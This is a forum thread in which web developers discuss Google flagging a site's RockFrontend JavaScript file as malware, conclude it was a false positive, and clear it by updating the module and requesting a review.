Google flagging Rockfrontend as malware

[heldercervantes]

@bernhard you might want to have a look at this. One of my sites is displaying the red screen of extermination, saying that the site is dangerous and contains malware.

Google itself wasn't much help with search console just giving me a vague answer, but using other tools it comes down to Rockfrontend's JS:



Has anyone had this issue? Any ideas?

Edit: I was on version Rockfrontend version 3.2.2. After updating to the current version, Sucuri's SiteCheck doesn't seem to complain about RF anymore and only says the site is blacklisted by GSF. I've requested a new review from Google and I'm awaiting a response.

[ryan]

@heldercervantes did you swap in a fresh copy of that file, or is that the same one that's bee there awhile? I grabbed that file mentioned from the site (RockFrontend.min.js) and un-minified it, and I'm guessing it's a false positive because I don't see any obvious monkey business in it. No references to other scripts or host names, no encoded strings, no obfuscated code, nothing that looks malware-ish to me. It is doing some iframe stuff, swapping of iframe src attributes and such, and it could that this is something that some malware does, but I think it's most likely legit here as it's using the same naming conventions in attributes as the rest of the code (i.e. starting with "rf.." for rock front-end). Anyone have any ideas why it detected it as malware? Even if I try to access the file in my browser, it gets blocked (since it's blacklisted), so I had to use wget to grab the file. 

Edit: I see you edited your message and that it's not the original file that got flagged. It'd be interesting to see what was in the older version. If it had malware in it, you'd want to check where it came from... like did it get modified by something after getting to your server, and if in a shared environment, are the file permissions too open?

[Jonathan Lahijani]

Is this related to the recent polyfill.js supply-chain attack?

https://news.ycombinator.com/item?id=40791829

https://sansec.io/research/polyfill-supply-chain-attack

[heldercervantes]

Thanks for your replies. It was most likely a false positive. After updating and requesting a new review, the site was cleared.

@ryan I don't think the file was modified. That would be too weirdly specific and discreet for a hack. It was probably something harmless the code that was raising suspicion. Sucks that without any fault a site that's running campaigns and paying to grab traffic would get such an alarming message from Google. Hard hit on the brand.

On a side note: First time ever that I had to update something on a published project. I have sites published almost 10 years ago that had zero issues of this sort.